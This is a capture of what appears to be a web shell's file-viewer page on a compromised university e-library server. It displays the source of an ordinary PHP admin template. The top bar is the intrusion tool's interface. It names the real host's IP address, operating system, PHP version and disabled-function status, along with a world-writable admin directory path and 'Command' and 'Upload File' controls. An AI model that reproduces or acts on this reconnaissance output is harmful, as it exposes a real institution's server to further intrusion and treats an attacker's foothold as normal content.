Server IP : 103.11.96.170 / Your IP : 3.15.5.27 Web Server : Microsoft-IIS/10.0 System : Windows NT WIN-F6SLGVICLOP 10.0 build 17763 (Windows Server 2016) AMD64 User : elibrary.unsap.ac.id ( 0) PHP Version : 7.4.19 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF Directory (0777) : D:/localhost/elibrary/repository/font/../../admin/admin_template/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!doctype html> <html> <head><title><?php echo $page_title ?></title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta http-equiv="Pragma" content="no-cache"/> <meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate, post-check=0, pre-check=0"/> <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/> <link rel="stylesheet" type="text/css" href="<?php echo SWB . 'css/bootstrap.min.css'; ?>"/> <link rel="stylesheet" type="text/css" href="<?php echo SWB . 'admin/' . $sysconf['admin_template']['css']; ?>?<?php echo date('this') ?>"/> <script type="text/javascript" src="<?php echo JWB; ?>jquery.js"></script> <script type="text/javascript" src="<?php echo JWB; ?>gui.js"></script> </head> <body> <div id="pageContent"> <?php echo $content; ?> </div> <div class="loader"></div> <!-- block if we inside iframe --> <script type="text/javascript"> // if we are inside iframe jQuery(document).ready(function () { <?php if (isset($_GET['block'])) { ?> var parentWin = self.parent; if (parentWin && parentWin.jQuery('.editFormLink').length > 0) { var enabler = parentWin.jQuery('.editFormLink'); jQuery(document.body).append('<div id="blocker" style="position: fixed; width: 100%; height: 100%; top: 0; left: 0; background: #ccc; opacity: 0.3"> </div>'); enabler.click(function (evt) { evt.preventDefault(); self.parent.jQuery('form').enableForm(); self.jQuery('#blocker').remove(); self.parent.jQuery('.makeHidden').removeClass('makeHidden'); }); } <?php } ?> }); </script> </body> </html>